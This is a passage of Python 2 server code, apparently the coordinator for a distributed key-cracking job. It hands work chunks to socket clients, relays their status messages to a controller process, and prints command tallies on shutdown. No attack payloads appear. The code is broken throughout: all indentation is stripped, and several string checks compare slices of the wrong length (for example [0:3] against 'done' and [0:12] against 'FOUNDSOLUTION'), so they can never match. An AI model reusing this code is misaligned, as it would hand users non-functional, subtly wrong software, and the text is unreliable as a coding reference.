self.dictionaryOfCurrentClientTasks[addr] = "" #Not working on anything, so value is the empty string
print "STATUS: Client successfully added to the Dictionary of Current Client Tasks"
#print str(len(self.listOfClients)) + " Client(s) are currently Connected."
#..................................................................................
#Server PRIMARY WHILE LOOP
#..................................................................................
try: #server primary while loop try block
while(self.serverIsRunning==True): #server primary while loop
#/////////////////////////////////////////////////////////////////////////////////
#Check for input from clients
#/////////////////////////////////////////////////////////////////////////////////
print "STATUS: Checking for input from client(s)..."
try: #check for client input try block
sock.settimeout(2.0)
theInput = sock.recv(2048) #listening for input
if(len(theInput) >= 1):
print "INFO: Received a message from a client."
if(self.checkForNextCommand(theInput)==True):
print "INFO: NEXT command was received"
self.sendNextChunkCommandToController()
elif(self.checkForFoundSolutionCommand(theInput)==True):
print "INFO: FOUNDSOLUTION command was received"
self.sendDoneCommandToController()
elif(self.checkForCrashedCommand(theInput)==True):
print "INFO: CRASHED command was received"
else:
print "ERROR: unknown command received"
print "The unknown command: '" + theInput + "'"
else:
print "INFO: The Empty String has been received."
except socket.timeout as inst:
print "STATUS: Socket has timed out. No input from client detected."
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Check for client input Try Block"
print type(inst) #the exception instance
print inst.args #srguments stored in .args
print inst #_str_ allows args tto be printed directly
print "========================================================================================"
#/////////////////////////////////////////////////////////////////////////////////
#Check for input from controller class
#/////////////////////////////////////////////////////////////////////////////////
print "STATUS: Checking for input from the Controller class..."
try: #check for input from controller try block
if(self.pipe.poll()):
recv = self.pipe.recv()
print "INFO: Received a message from the controller"
#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
#Determine what type of object the controller has sent the server
#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
#assume that a chunk object has been received, if not try again as a string
print "STATUS: Extracting String from received object..."
extractedTheString = False #variable that records whether the success of the extraction
try: #attempt to extract params from a chunk object
chunkParams = recv.params
print "INFO: String has been extracted from a chunk object"
extractedTheString= True
self.recordOfInboundCommandsFromControllerToServer['Chunk_Objects'] = (self.recordOfInboundCommandsFromControllerToServer['Chunk_Objects'] + 1)
except Exception as inst:
#print "========================================================================================"
# print "ERROR: An exception has been thrown in the extract params from chunk object Try Block"
print "Received object is not a chunk object."
#print type(inst) #the exception instance
#print inst.args #srguments stored in .args
#print inst #_str_ allows args tto be printed directly
#print "========================================================================================"
if(extractedTheString == False):
chunkParams = recv
print "INFO: String extracted from a String Object"
else: #if extractedTheString == True (meaning a chunk object)
print "STATUS: Extracting data from chunk object..."
chunkData = recv.data
print "INFO: Successfully extracted data from chunk object"
print "DEBUG: Data that was extracted: '" +str(chunkData) + "'"
if(len(chunkParams) < 1):
print "WARNING: Extracted the empty string from the chunk params"
else:
print "INFO: Successfully extracted params from chunk"
print "DEBUG: Info extracted from the received object: '" + str(chunkParams) + "'"
self.listOfControllerMessages.append(chunkParams)
print "INFO: The extracted string has been added to the listOfControllerMessages"
'''if(type(recv) is Chunk): #Determination by type definition
print "I/O: Received a Chunk Object From the Controller"
self.recordOfInboundCommandsFromControllerToServer['Chunk_Objects'] = (self.recordOfInboundCommandsFromControllerToServer['Chunk_Objects'] + 1)
inputChunkParams = recv.params #copy the parameters from the received object to the inputChunk
print "DEBUG: The recv.params: " + str(recv.params)
print "DEBUG: The inputChunkParams: " + str(inputChunkParams)
inputChunkData = recv.data #copy the data from the received object to the inputChunk
print "DEBUG: The recv.data: " + str(recv.data)
print "DEBUG: The inputChunkData: " + str(inputChunkData)
print " "
print "THIS FUNCTION IS NOT YET FINISHED"
print "-Need to begin to read information from the params lines"
print " "
elif(type(recv) is str):
print "I/O: Received a String Object From the Controller"
if(self.checkForNextChunk(recv)==True):
print "INFO: Received the reply to the NextChunk command"
elif(self.checkForChunkAgain(recv)==True):
print "INFO: Received the reply to the ChunkAgain command"
elif(self.checkForFound(recv)==True):
print "INFO: Received reply stating whether the key has been found or not"
else:
print "ERROR: Received an unknown command from the controller"
print "The unknown command: '" + str(recv) + "'"
else:
print " "
print "ERROR: Received a message with an invalid type: " + str(type(recv))
print " " '''
else:
print "STATUS: No command was received from the controller class"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Check for input from Controller class Try Block"
print type(inst) #the exception instance
print inst.args #srguments stored in .args
print inst #_str_ allows args tto be printed directly
print "========================================================================================"
#/////////////////////////////////////////////////////////////////////////////////
#Distribute command to clients if needed
#/////////////////////////////////////////////////////////////////////////////////
try: #distribute command try block
print "STATUS: Checking to see if a command needs to be send to the clients..."
#check to see if there are any commands that the controller has sent to the server
if(len(self.listOfControllerMessages) < 1):
print "INFO: There are no new commands from the controller class"
else:
print "INFO: There are " + str(len(self.listOfControllerMessages)) + " new command(s) from the controller class"
for i in range(0,len(self.listOfControllerMessages)):
print str(i) + ") " + str(self.listOfControllerMessages[i])
print " "
#print "INFO: " + str(len(self.dictionaryOfClientsWaitingForAReply)) + " Client(s) are currently waiting for a reply"
print "INFO: " + str(len(self.listOfClientsWaitingForAReply)) + " Client(s) are currently waiting for a reply"
#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
#Figure out what each of the received commands are and who it needs to go to, then distribute accordingly
#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
print " "
print "STATUS: Figuring Out What Each Command Is and Who It Needs To Be Sent To"
for i in range(0, len(self.listOfControllerMessages)):
print "Command " + str(i) + ") " + str(self.listOfControllerMessages[i])
analysisString= str(self.listOfControllerMessages[i])
#***************************************************************************************
#Looking for NEXTCHUNK command
#***************************************************************************************
if(analysisString[0] == "n"):
if(analysisString[1] == "e"):
if(analysisString[2] == "x"):
if(analysisString[3] == "t"):
if(analysisString[4] == "C"):
if(analysisString[5] == "h"):
if(analysisString[6] == "u"):
if(analysisString[7] == "n"):
if(analysisString[8] == "k"):
try: #looking for NEXTCHUNK in analysis string try block
print "Command Type: nextChunk"
#extract information from chunk
#get ip address of client waiting for reply
try: #send nextChunk message to client try block
tempAddr= self.listOfClientsWaitingForAReply[0]
tempSock, tempAddr2= self.findClientSocket(tempAddr)
clientMessage= str(analysisString)
#if(tempSock is None):
# raise Exception("tempSock is of type None! Unable to send message")
self.sendNextToClient(tempSock,tempAddr2,clientMessage)
del self.listOfClientsWaitingForAReply[0]
print "INFO: Removed client from the listOfClientsWaitingForAReply"
#print "DEBUG: AFTER MESSAGE WAS (SUPPOSEDLY) SENT TO CLIENT " + str(tempAddr)
print "DEBUG: Message: " + str(clientMessage)
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Send NEXTCHUNK message to client try block"
print type(inst) #the exception instance
print inst.args #srguments stored in .args
print inst #_str_ allows args tto be printed directly
print "========================================================================================"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the looking for NEXTCHUNK in analysis string Try Block"
print type(inst) #the exception instance
print inst.args #srguments stored in .args
print inst #_str_ allows args tto be printed directly
print "========================================================================================"
#***************************************************************************************
#Looking for DONE command
#***************************************************************************************
elif(analysisString[0:3] == "done"): #looking for DONE Command
print "Command Type: done"
print " "
print "Function Not Yet Completed, Thinking I might make this issue the done command to all clients"
print " "
#***************************************************************************************
#Command is unknown
#***************************************************************************************
else: #command is unknown
print "WARNING: Received Unknown Command From Controller:" + analysisString
print "INFO: Unknown Command is being ignored"
print "STATUS: Clearing listOfControllerMessages..."
del self.listOfControllerMessages[:]
print "STATUS: listOfControllerMessages has been cleared"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Distribute command to clients Try Block"
print type(inst) #the exception instance
print inst.args #srguments stored in .args
print inst #_str_ allows args tto be printed directly
print "========================================================================================"
#/////////////////////////////////////////////////////////////////////////////////
#Check to see if another client is trying to connect
#/////////////////////////////////////////////////////////////////////////////////
try: #check to see if another client is trying to connect try block
print "STATUS: Checking to see if another client is trying to connect..."
self.serverSocket.settimeout(2.0)
sock, addr =self.serverSocket.accept()
print "INFO: Connected with " + addr[0] + ":" + str(addr[1])
self.listOfClients.append((sock, addr))
print "INFO: Client successfully added to the list of clients"
print str(len(self.listOfClients)) + " Client(s) are currently Connected."
self.dictionaryOfCurrentClientTasks[addr] = "" #Client has no task currently, so value is the empty string
print "STATUS: Client was successfully added to the Dictionary of Current Client Tasks"
except socket.timeout as inst:
print "STATUS: Socket timed out. No client is trying to connect."
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Check to see if another client is trying to connect Try Block"
print type(inst) #the exception instance
print inst.args #srguments stored in .args
print inst #_str_ allows args tto be printed directly
print "========================================================================================"
finally:
print "INFO: Currently, there are " + str(len(self.listOfClients)) + " clients currently connected"
#..................................................................................
#END OF MAIN SERVER LOOP
#..................................................................................
except Exception as inst: #Exception for Server Primary While Loop Try Block
print "========================================================================================"
print "ERROR: An exception has been thrown in the Server Primary While Loop Try Block"
print type(inst) #the exception instance
print inst.args #srguments stored in .args
print inst #_str_ allows args tto be printed directly
print "========================================================================================"
finally:
print "Closing the socket..."
self.serverSocket.close()
print "Socket has been closed"
print "STATUS: Issuing the DONE command to clients..."
for x in range(0, len(self.listOfClients)):
(sock, addr) = self.listOfClients[x]
sock.sendall("DONE")
print "INFO: Issued the DONE command to client: " + str(addr)
print "STATUS: Finished Issuing the DONE command to clients"
try:
print " "
print "Printing List of Crashed Clients"
print "---------------------------------"
if(len(self.listOfCrashedClients) < 1):
print "No Clients Crashed During This Session"
else:
for x in range(0, len(self.listOfCrashedClients)):
print str(x) + ") " + str(self.listOfCrashedClients[x]) + " reported a Crash"
print "(END OF LIST OF CRASHED CLIENTS)"
print "---------------------------------"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Finally Block, in the print List of Crash Clients Section"
print type(inst) #the exception instance
print inst.args #srguments stored in .args
print inst #_str_ allows args tto be printed directly
print "========================================================================================"
try:
print " "
print "Printing List Of Clients Waiting For A Reply"
print "--------------------------------------------------"
if(len(self.listOfClientsWaitingForAReply) < 1):
print "No Clients Are Waiting For A Reply When The Session Ended"
else:
for x in range(0,len(self.listOfClientsWaitingForAReply)):
print "[" + str(x) + "] =" + str(self.listOfClientsWaitingForAReply[x])
print "(END OF LIST OF CLIENTS WAITING FOR A REPLY)"
print "--------------------------------"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Finally Block, in the print Dictionary of Clients Waiting For A Reply Section"
print type(inst) #the exception instance
print inst.args #srguments stored in .args
print inst #_str_ allows args tto be printed directly
print "========================================================================================"
try:
print " "
print "Printing List of Controller Messages (As the list was when the socket was closed)"
print "---------------------------------------------------------------------------------"
if(len(self.listOfControllerMessages) < 1):
print "There are no Messages from the Controller At this time"
else:
for x in range(0,len(self.listOfControllerMessages)):
print str(x) + ") " + str(self.listOfControllerMessages[x])
print "(END OF LIST OF CONTROLLER MESSAGES)"
print "-----------------------------------------"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Finally Block, in the print List of Controller Messages Section"
print type(inst) #the exception instance
print inst.args #srguments stored in .args
print inst #_str_ allows args tto be printed directly
print "========================================================================================"
try:
print " "
print "COMMAND RECORDS: Part 1/4"
print "Printing Record of OutBound Commands from Server to Controller"
print "----------------------------------------------------------------"
#print nextChunk records
if(self.recordOfOutboundCommandsFromServerToController['nextChunk'] > 0):
print "# of nextChunk Commands sent from Server to Controller: " + str(self.recordOfOutboundCommandsFromServerToController['nextChunk'])
else:
print "# of nextChunk Commands sent from Server to Controller: 0"
#print chunkAgain records
if(self.recordOfOutboundCommandsFromServerToController['chunkAgain'] > 0):
print "# of chunkAgain Commands sent from Server to Controller: " + str(self.recordOfOutboundCommandsFromServerToController['chunkAgain'])
else:
print "# of chunkAgain Commands sent from Server to Controller: 0"
#print waiting records
if(self.recordOfOutboundCommandsFromServerToController['waiting'] > 0):
print "# of waiting Commands sent from Server to Controller: " + str(self.recordOfOutboundCommandsFromServerToController['waiting'])
else:
print "# of waiting Commands sent from Server to Controller: 0"
#print done records
if(self.recordOfOutboundCommandsFromServerToController['done'] > 0):
print "# of done Commands sent from Server to Controller: " + str(self.recordOfOutboundCommandsFromServerToController['done'])
else:
print "# of done Commands sent from Server to Controller: 0"
print "(END OF RECORD OF OUTBOUND COMMANDS FROM SERVER TO CONTROLLER)"
print "---------------------------------------------------------------"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Finally Block, in the print Record of Outbound Commands from Server to Controller Section"
print type(inst) #the exception instance
print inst.args #srguments stored in .args
print inst #_str_ allows args tto be printed directly
print "========================================================================================"
try:
print " "
print "COMMAND RECORDS: Part 2/4"
print "Printing Record of Outbound Commands from Server to Client(s)"
print "------------------------------------------------------------"
#print the DONE records
if(self.recordOfOutboundCommandsFromServerToClient['DONE'] > 0):
print "# of DONE Commands sent from Server to Client(s): " + str(self.recordOfOutboundCommandsFromServerToClient['DONE'])
else:
print "# of DONE Commands sent from Server to Client(s): 0"
#print the nextChunk records
if(self.recordOfOutboundCommandsFromServerToClient['nextChunk'] > 0):
print "# of nextChunk Commands sent from Server to Client(s): " + str(self.recordOfOutboundCommandsFromServerToClient['nextChunk'])
else:
print "# of nextChunk Commands sent from Server to Client(s): 0"
print "(END OF RECORD OF OUTBOUND COMMANDS FROM SERVER TO CLIENT"
print "-----------------------------------------------------------"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Finally Block, in the print Record of Outbound Commands from Server to Client(s) Section"
print type(inst) #the exception instance
print inst.args #srguments stored in .args
print inst #_str_ allows args tto be printed directly
print "========================================================================================"
try:
print " "
print "COMMAND RECORDS: Part 3/4"
print "Printing Record of Inbound Commands from Controller to Server"
print "--------------------------------------------------------------"
#print the REPLY TO NEXT CHUNK
if(self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_NEXT_CHUNK'] > 0):
print "# of REPLY TO NEXT CHUNK Commands received from Controller: " + str(self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_NEXT_CHUNK'])
else:
print "# of REPLY TO NEXT CHUNK Commands received from Controller: 0"
#print the REPLY TO CHUNK AGAIN
if(self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_CHUNK_AGAIN'] > 0):
print "# of REPLY TO CHUNK AGAIN Commands received from Controller: " + str(self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_CHUNK_AGAIN'])
else:
print "# of REPLY TO CHUNK AGAIN Commands received from Controller: 0"
#print the REPLY TO DONE
if(self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_DONE'] > 0):
print "# of REPLY TO DONE Commands reeived from Controller: " + str(self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_DONE'])
else:
print "# of REPLY TO DONE Commands received from Controller: 0"
#print the Chunk Objects
if(self.recordOfInboundCommandsFromControllerToServer['Chunk_Objects'] > 0):
print "# of Chunk Objects received from Controller: " + str(self.recordOfInboundCommandsFromControllerToServer['Chunk_Objects'])
else:
print "# of Chunk Objects received from Controller: 0"
print "(END OF RECORD OF INBOUND COMMANDS FROM THE CONTROLLER)"
print "------------------------------------------------------------"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Finally Block, in the print Record of Inbound Commands from Controller Section"
print type(inst) #the exception instance
print inst.args #srguments stored in .args
print inst #_str_ allows args tto be printed directly
print "========================================================================================"
try:
print " "
print "COMMANDS RECORDS: Part 4/4"
print "Printing Inbound Commands from Client(s) to Server"
print "----------------------------------------------------"
#print NEXT
if(self.recordOfInboundCommandsFromClientToServer['NEXT'] > 0):
print "# of NEXT Commands received from Client(s): " + str(self.recordOfInboundCommandsFromClientToServer['NEXT'])
else:
print "# of NEXT Commands received from Client(s): 0"
#print FOUNDSOLUTION
if(self.recordOfInboundCommandsFromClientToServer['FOUNDSOLUTION'] > 0):
print "# of FOUNDSOLUTION Commands received from Client(s): " + str(self.recordOfInboundCommandsFromClientToServer['FOUNDSOLUTION'])
else:
print "# of FOUNDSOLUTION COmmands received from Client(s): 0"
#print CRASHED
if(self.recordOfInboundCommandsFromClientToServer['CRASHED'] > 0):
print "# of CRASHED Commands received from Client(s): " + str(self.recordOfInboundCommandsFromClientToServer['CRASHED'])
else:
print "# of CRASHED Commands received from Client(s): 0"
print "(END OF RECORD OF INBOUND COMMANDS FROM CLIENT(S))"
print "------------------------------------------------------"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Finally Block, in the print Record of Inbound Commands from Client(s) Section"
print type(inst) #the exception instance
print inst.args #srguments stored in .args
print inst #_str_ allows args tto be printed directly
print "========================================================================================"
print " "
#--------------------------------------------------------------------------------
#End of Constructor Block
#--------------------------------------------------------------------------------
#=================================================================================================
#SERVER-CONTROLLER COMMUNICATION FUNCTIONS
#This section contains methods that the server will use to communicate with the controller class
#=================================================================================================
#------------------------------------------------------------------------------
#Outbound communication with Controller
#------------------------------------------------------------------------------
#..............................................................................
#nextChunk
#..............................................................................
def sendNextChunkCommandToController(self):
try:
self.pipe.send("nextChunk")
print "I/O: The NEXTCHUNK command was sent to the Controller"
#increment record counter
self.recordOfOutboundCommandsFromServerToController['nextChunk'] = (self.recordOfOutboundCommandsFromServerToController['nextChunk'] + 1)
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Controller Outbound sendNextChunkCommand Try Block"
#the exception instance
print type(inst)
#srguments stored in .args
print inst.args
#_str_ allows args tto be printed directly
print inst
print "============================================================================================="
#..............................................................................
#chunkAgain
#..............................................................................
def sendChunkAgainCommandToController(self):
try:
self.pipe.send("chunkAgain")
print "I/O: The CHUNKAGAIN command was sent to the Controller"
#increment the record counter
self.recordOfOutboundCommandsFromServerToController['chunkAgain'] = (self.recordOfOutboundCommandsFromServerToController['chunkAgain'] + 1)
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Controller Outbound sendChunkAgainCommand Try Block"
#the exception instance
print type(inst)
#srguments stored in .args
print inst.args
#_str_ allows args tto be printed directly
print inst
print "============================================================================================="
#..............................................................................
#waiting
#..............................................................................
def sendWaitingCommandToController(self):
try:
self.pipe.send("waiting")
print "I/O: The WAITING command was sent to the Controller"
#increment the record counter
self.recordOfOutboundCommandsFromServerToController['waiting'] = (self.recordOfOutboundCommandsFromServerToController['waiting'] + 1)
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Controller Outbound sendWaitingCommend Try Block"
#the exception instance
print type(inst)
#srguments stored in .args
print inst.args
#_str_ allows args tto be printed directly
print inst
print "============================================================================================="
#..............................................................................
#done
#..............................................................................
def sendDoneCommandToController(self):
try:
self.pipe.send("done ")
print "I/O: The DONE command was sent to the Controller"
#increment the record counter
self.recordOfOutboundCommandsFromServerToController['done'] = (self.recordOfOutboundCommandsFromServerToController['done'] + 1)
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Controller Outbound sendDoneCommand Try Block"
#the exception instance
print type(inst)
#srguments stored in .args
print inst.args
#_str_ allows args tto be printed directly
print inst
print "============================================================================================="
#------------------------------------------------------------------------------
#Inbound communication with controller
#------------------------------------------------------------------------------
#..............................................................................
#REPLY TO NEXTCHUNK
#..............................................................................
def checkForNextChunk(self,inboundString): #check to see if the string contains the next chunk of the problem
try:
print "STATUS: Checking to see if inboundString is the next part of problem..."
if(len(inboundString) < 1):
return False
if inboundString == "nextChunk":
#position 9 will be a space
print "I/O: NEXTCHUNK command was received from the controller class"
self.listOfControllerMessages.append(str(inboundString))
print "INFO: NEXTCHUNK command was added to the listOfControllerMessages"
self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_NEXT_CHUNK'] = (self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_NEXT_CHUNK'] + 1)
return True
# if(inboundString[0] == "N"): #OLD METHOD
# if(inboundString[1] == "E"):
# if(inboundString[2] == "X"):
# if(inboundString[3] == "T"):
# if(inboundString[4] == "C"):
# if(inboundString[5] == "H"):
# if(inboundString[6] == "U"):
# if(inboundString[7] == "N"):
# if(inboundString[8] == "K"):
# #position 9 will be a space
# print "INFO: NEXTCHUNK command was received from the controller class"
# self.listOfControllerMessages.append(str(inboundString))
# print "INFO: NEXTCHUNK command was added to the listOfControllerMessages"
# return True
else:
return False
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Controller Inbound checkForNextChunk Try Block"
#the exception instance
print type(inst)
#srguments stored in .args
print inst.args
#_str_ allows args tto be printed directly
print inst
print "============================================================================================="
#..............................................................................
#REPLY TO CHUNKAGAIN
#..............................................................................
def checkForChunkAgain(self,inboundString): #check to see if the string contains that chunk that was requested
try:
print "STATUS: Checking to see if inboundString is the requested chunk (chunkAgain)..."
if(len(inboundString) < 1):
return False
if(inboundString[0:9] == "CHUNKAGAIN"):
#position 10 will be a space
print "I/O: CHUNKAGAIN command was received from the controller class"
self.listOfControllerMessages.append(str(inboundString))
print "INFO: CHUNKAGAIN command was added to the listOfControllerMessages"
self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_CHUNK_AGAIN'] = (self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_CHUNK_AGAIN'] + 1)
return True
else:
return False
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Controller Inbound checkForChunkAgain Try Block"
#the exception instance
print type(inst)
#srguments stored in .args
print inst.args
#_str_ allows args tto be printed directly
print inst
print "============================================================================================="
#..............................................................................
#REPLY TO DONE
#..............................................................................
def checkForFound(self,inboundString): #checks to see if the inboundString says it found the key (or if it didnt)
try:
print "STATUS: Checking to see if the key was found..."
if(len(inboundString) < 1):
return False
if(inboundString[0:4] == "Found"):
print "I/O: The Controller Says that the key has been Found"
print " "
print "This section of the code is NOT FINISHED YET"
print " -Need To Issue Done Command To All CLients at this point"
#print "STATUS: Issuing the DONE command to all clients..."
self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_DONE'] = (self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_DONE'] + 1)
return True
elif(inboundString[0:7] == "notFound"):
print "INFO: The Controller says that the key has no been found yet"
print " "
print "This Section of the code is NOT FINISHED YET"
print " -Need to tell client that no solution was found, request for the next chunk"
self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_DONE'] = (self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_DONE'] + 1)
return True
else:
return False
# if(inboundString=="Found"): #OLD METHOD
# print "The Controller says that the key has been Found"
# return True
# elif(inboundString=="notFound"):
# return False
# else:
# print "==================================================="
# print "ERROR: Invalid input from the Controller class"
# print "The Invalid input: '" + inboundString + "'"
# print "==================================================="
# return False
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Controller Inbound checkForFound Try Block"
#the exception instance
print type(inst)
#srguments stored in .args
print inst.args
#_str_ allows args tto be printed directly
print inst
print "============================================================================================="
#=================================================================================================
#SERVER-CLIENT COMMUNICATION FUNCTIONS
#This section contains methods used by the server to communicate with the clients
#=================================================================================================
#------------------------------------------------------------------------------
#Outbound communication functions
#------------------------------------------------------------------------------
#..............................................................................
#DONE
#..............................................................................
def sendDoneCommandToClient(self,recipientsSocket, recipientIPAddress): #sends the DONE command to a client
try:
recipientsSocket.sendto("DONE", recipientIPAddress)
print "I/O: The DONE command was issued to: " + str(recipientIPAddress)
#increment the record counter
self.recordOfOutboundCommandsFromServerToClient['DONE'] = (self.recordOfOutboundCommandsFromServerToClient['DONE'] + 1)
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Client Outbound sendDoneCommand Try Block"
#the exception instance
print type(inst)
#srguments stored in .args
print inst.args
#_str_ allows args tto be printed directly
print inst
print "============================================================================================="
#..............................................................................
#next part in cracking problem
#..............................................................................
def sendNextToClient(self,recipientsSocket, recipientIPAddress, theNextPart): #sends the next part of problem to the client
try:
recipientsSocket.sendto(theNextPart, recipientIPAddress)
print "I/O: The nextChunk of the problem was sent to: " + str(recipientIPAddress)
#increment the record counter
self.recordOfOutboundCommandsFromServerToClient['nextChunk'] = (self.recordOfOutboundCommandsFromServerToClient['nextChunk'] + 1)
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Client Outbound sendNext Try Block"
#the exception instance
print type(inst)
#srguments stored in .args
print inst.args
#_str_ allows args tto be printed directly
print inst
print "============================================================================================="
#------------------------------------------------------------------------------
#Inbound communication functions
#------------------------------------------------------------------------------
#..............................................................................
#NEXT
#..............................................................................
def checkForNextCommand(self,inboundString): #checks for the NEXT command
try:
if(inboundString[0]=="N"):
if(inboundString[1]=="E"):
if(inboundString[2]=="X"):
if(inboundString[3]=="T"):
print "I/O: A Client has issued the NEXT command"
#position 4 is a space
tempIP= ""
for i in range(5, len(inboundString)):
tempIP= tempIP + inboundString[i]
self.listOfClientsWaitingForAReply.append(tempIP)
#self.dictionaryOfClientsWaitingForAReply[tempIP] = "NEXTCHUNK"
print "INFO: Client (" + str(tempIP) + ") was added the listOfClientsWaitingForAReply"
#print "INFO: Client (" + str(tempIP) + ") was added the dictionaryOfClientsWaitingForAReply"
self.recordOfInboundCommandsFromClientToServer['NEXT'] = (self.recordOfInboundCommandsFromClientToServer['NEXT'] + 1)
return True
else:
return False
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Client Inbound checkForNextCommand Try Block"
#the exception instance
print type(inst)
#srguments stored in .args
print inst.args
#_str_ allows args tto be printed directly
print inst
print "============================================================================================="
#..............................................................................
#FOUNDSOLUTION
#..............................................................................
def checkForFoundSolutionCommand(self,inboundString): #checks for the "FOUNDSOLUTION" string
try:
if(inboundString[0:12] == "FOUNDSOLUTION"):
print "I/O: A Client has issued the FOUNDSOLUTION command"
#position 13 is a space
tempIP= ""
for i in range(14, len(inboundString)):
tempIP= tempIP + inboundString[i]
self.listOfClientsWaitingForAReply.append(tempIP)
#print "INFO: Client (" + str(tempIP) + ") was added to the dictionaryOfClientsWaitingForAReply"
print "INFO: Client (" + str(tempIP) + ") was added to the listOfClientsWaitingForAReply"
self.recordOfInboundCommandsFromClientToServer['FOUNDSOLUTION'] = (self.recordOfInboundCommandsFromClientToServer['FOUNDSOLUTION'] + 1)
return True
# if(inboundString[0]=="F"): #OLD METHOD
# if(inboundString[1]=="O"):
# if(inboundString[2]=="U"):
# if(inboundString[3]=="N"):
# if(inboundString[4]=="D"):
# if(inboundString[5]=="S"):
# if(inboundString[6]=="O"):
# if(inboundString[7]=="L"):
# if(inboundString[8]=="U"):
# if(inboundString[9]=="T"):
# if(inboundString[10]=="I"):
# if(inboundString[11]=="O"):
# if(inboundString[12]=="N"):
# print "A Client has issued the FOUNDSOLUTION command"
# #position 13 is a space
# tempIP= ""
# for i in range(14, len(inboundString)):
# tempIP= tempIP + inboundString[i]
# self.dictionaryOfClientsWaitingForAReply[tempIP] = "FOUNDSOLUTION"
# print "INFO: Client (" + str(tempIP) + ") was added to the dictionaryOfClientsWaitingForAReply"
# return True
else:
return False
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Client Inbound checkForFoundSolutionCommand Try Block"
#the exception instance
print type(inst)
#srguments stored in .args
print inst.args
#_str_ allows args tto be printed directly
print inst
print "============================================================================================="
#..............................................................................
#CRASHED
#..............................................................................
def checkForCrashedCommand(self,inboundString): #checks for the "CRASHED" Command
try:
if(len(inboundString) < 1):
print "INFO: Empty Crashed Message Received."
return False
# if(inboundString[0:6] == "CRASHED"): #NEW DETECTION SYSTEM, VERY FAULTY
# tempCrashIP = ""
#position 7 is a space between the ip address and the crashed message
# for i in range(8, len(inboundString)):
# if(inboundString[i].isalpha()):
# print "WARNING: A Non-Numeral Value Was Detected In The Ip Address, Ignoring Remainder of String"
# break
# else:
# tempCrashIP = tempCrashIP + inboundString[i]
# if(len(tempCrashIP) < 1): #if the length is less than one, stop performing an IP check
# return False
# print "WARNING: A Client has issued the CRASHED command"
# print "The Crashed Client IP: " + tempCrashIP
# self.listOfCrashedClients.append(tempCrashIP)
# print "INFO: The crashed client's IP address has been added to the listOfCrashedClients"
#look through listOfConnected clients and find the matching ip address
# print "STATUS: Looking for matching IP address in list of clients..."
# foundMatch= False
# tempAddr2= ""
# for index in range(0, len(self.listOfClients)):
# tempSock, tempAddr= self.listOfClients[index] #get socket and ip address of client
# print "STATUS: Copying list of clients' IP Address to a new string"
# tempAddr2= str(tempAddr[0])
# print "STATUS: Comparing IP Addresses..."
# if(tempCrashIP == tempAddr2):
# print "INFO: Matching IP address was found in the list of clients"
# #print "DEBUG: tempAddr=" + str(tempAddr)
# del self.listOfClients[index]
# print "INFO: The crashed client " + str(tempAddr) + " was removed from the list of clients"
# foundMatch= True
# break
# else:
# print "INFO: No Match found yet. " + str(tempCrashIP) + " != " + str(tempAddr2)
# if(foundMatch == False):
# print "WARNING: No Matching IP address was found in the list of clients"
# print "INFO: Unable to Find the Crashed IP: " +str(tempCrashIP) + " "
# else:
# self.recordOfInboundCommandsFromClientToServer['CRASHED'] = (self.recordOfInboundCommandsFromClientToServer['CRASHED'] + 1)
# return True
# else:
# return False
if(inboundString[0]=="C"):
if(inboundString[1]=="R"):
if(inboundString[2]=="A"):
if(inboundString[3]=="S"):
if(inboundString[4]=="H"):
if(inboundString[5]=="E"):
if(inboundString[6]=="D"):
tempCrashIP = ""
#position 7 is a space between the ip address and the crashed message
for i in range(8, len(inboundString)):
if(inboundString[i].isalpha()):
print "WARNING: A Non-Numeral Value Was Detected In The Ip Address, Ignoring Remainder of String"
